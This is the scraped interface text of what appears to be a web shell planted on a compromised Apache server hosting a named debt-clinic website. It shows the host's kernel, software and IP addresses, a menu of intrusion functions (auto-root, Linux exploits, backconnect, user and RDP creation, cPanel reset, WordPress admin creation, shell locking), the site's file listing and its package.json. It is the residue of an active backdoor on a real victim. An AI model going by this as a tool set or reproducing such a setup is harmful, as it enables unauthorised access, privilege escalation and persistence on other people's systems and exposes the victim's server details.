Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.12.136.98
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2024 /
happydebtclinic.com /
[ HOME SHELL ]
Name
Size
Permission
Action
build
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
.htaccess
340
B
-rwxr-xr-x
README.md
3.28
KB
-rwxr-xr-x
asset-manifest.json
1.71
KB
-rwxr-xr-x
config-overrides.js
165
B
-rwxr-xr-x
favicon.ico
3.78
KB
-rwxr-xr-x
index.html
1.4
KB
-rwxr-xr-x
logo192.png
5.22
KB
-rwxr-xr-x
logo512.png
9.44
KB
-rwxr-xr-x
manifest.json
492
B
-rwxr-xr-x
package-lock.json
789.08
KB
-rwxr-xr-x
package.json
1.33
KB
-rwxr-xr-x
robots.txt
67
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "my-app", "version": "0.1.0", "private": true, "dependencies": { "@fortawesome/fontawesome-free": "^6.5.2", "@testing-library/jest-dom": "^5.17.0", "@testing-library/react": "^13.4.0", "@testing-library/user-event": "^13.5.0", "axios": "^1.6.8", "bootstrap": "^5.3.3", "primeicons": "^7.0.0", "primereact": "^10.6.5", "react": "^18.3.1", "react-bootstrap": "^2.10.2", "react-datepicker": "^7.0.0", "react-dom": "^18.3.1", "react-router-bootstrap": "^0.26.2", "react-router-dom": "^6.23.1", "react-scripts": "^5.0.1", "sass": "^1.77.1", "swiper": "^11.1.4", "web-vitals": "^2.1.4" }, "devDependencies": { "@babel/plugin-transform-private-property-in-object": "^7.21.11", "customize-cra": "^1.0.0", "react-app-rewired": "^2.1.9", "source-map-loader": "^4.0.0" }, "scripts": { "start": "react-app-rewired start", "build": "react-app-rewired build", "test": "react-app-rewired test", "eject": "react-scripts eject" }, "eslintConfig": { "extends": [ "react-app", "react-app/jest" ] }, "browserslist": { "production": [ ">0.2%", "not dead", "not op_mini all" ], "development": [ "last 1 chrome version", "last 1 firefox version", "last 1 safari version" ] } }
Close